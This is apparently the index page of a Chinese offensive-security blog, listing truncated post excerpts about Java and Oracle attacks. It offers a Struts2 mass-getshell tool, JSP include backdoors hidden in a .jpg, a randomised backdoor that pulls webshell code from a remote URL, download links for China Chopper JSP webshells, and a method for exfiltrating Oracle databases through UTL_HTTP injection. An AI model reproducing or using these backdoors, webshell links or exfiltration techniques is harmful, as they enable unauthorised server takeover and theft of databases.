PHP & Java

Open The Door,SF Express!!

Struts2漏洞批量GetShell到MongoDb数据库

yzmm
Tools
936 阅读
2 评论

这个很简单的,改下main的str的关键字就可以自动getshell并倒入mongodb数据库。 [只需要添加jsoup和mongodb的jar包] import java.io.IOException; import java.net.URL; import java.net.URLConnection; import java.net.UnknownHostException; import ...

阅读全文

jsp include后门文件

yzmm
Java
659 阅读
0 评论

jsp能像php asp什么的include后门文件吗?  不可以吧,jsp只能include jsp文件吧?要不怎么没看见有人说过jsp include后门呢?  真的可以吗?为什么可以?如果<%@ include可以那么<jsp:include可不可以呢? index.jsp包含1.jpg:  1.jpg内容是我们的菜刀一句话: Server编译后in...

阅读全文

JavaWeb随机后门?

yzmm
Tools
715 阅读
0 评论

我的思路是先从远程读取要生成的shell内容,然后把shell藏在WEB-INF下shell的名字和长度也都随机生成。比如: 不过就算藏在WEB-INF下也会被发现,干脆用一次就删一次?这样不会在任何目录下留下Shell。 菜刀链接:http://localhost/Demo2/new.jsp?url=http://xsser.me/caidao/css.jsp <%@ page langu...

阅读全文

菜刀Jsp脚本最终更新版

yzmm
Tools
1020 阅读
0 评论

脚本下载地址: JSP脚本:http://xsser.me/caidao/css.jsp Jspx脚本:http://xsser.me/caidao/jspx.jspx Jspf脚本:http://xsser.me/caidao/css.jspf 详情:http://xsser.me/caidao/1.txt 修复上一版BUG:  1、修复Oracle无setCatalog的BUG。&n...

阅读全文

Java实现C段域名IP采集

yzmm
Java
635 阅读
0 评论

只要再简简单单的封装一下就能够以在线的方式供别人查询了。 package net.ltan.bbs.util; import java.util.ArrayList; import java.util.List; import java.util.regex.Matcher; import java.util.regex.Pattern; public class DomainUtil { sta...

阅读全文

Oracle UTL_HTTP 注入点友情备份数据库

yzmm
Oracle
1430 阅读
0 评论

很多人只听说过用UTL_HTTP注入Oracle,似乎没看见有人用UTL_HTTP脱裤? UTL_HTTP 会查询数据库并带着查询的结果去请求我们的URL,也就是我注入点上写的URL。请注意:UTL_HTTP是一条一条的去请求的,所以会跟数据库保持一个长连接。而数据量过大的话会导致数据丢失,如果想完整的友情备份这种方法并不是特别可行。 只有在浏览器上请求这个注入点Oracle会自动的把自己的裤子送...

阅读全文

Oracle JDBC获取DDL

yzmm
Oracle
1381 阅读
0 评论

在Oracle的console获取DDL语句: SET LONG 2000000 SET PAGESIZE 0 EXECUTE DBMS_METADATA.SET_TRANSFORM_PARAM(DBMS_METADATA.SESSION_TRANSFORM,'STORAGE',false); select dbms_metadata.GET_DDL(u.object_type,u...

阅读全文

Java 调用外部s扫描并获取扫描结果

yzmm
Java
650 阅读
0 评论

这个实在太简单了,不过还是记录下来吧。java.lang.Runtime.getRuntime().exec("xxxxx");执行完之后其实返回的是一个流对象,那么也就是说调用一个外部的exe之类执行过程中的结果也可以在流中看到。调用后记得关闭后台的exe进程哦,偷懒就不写了。 简单实现代码: package net.ltan.test; import java.io.Buf...

阅读全文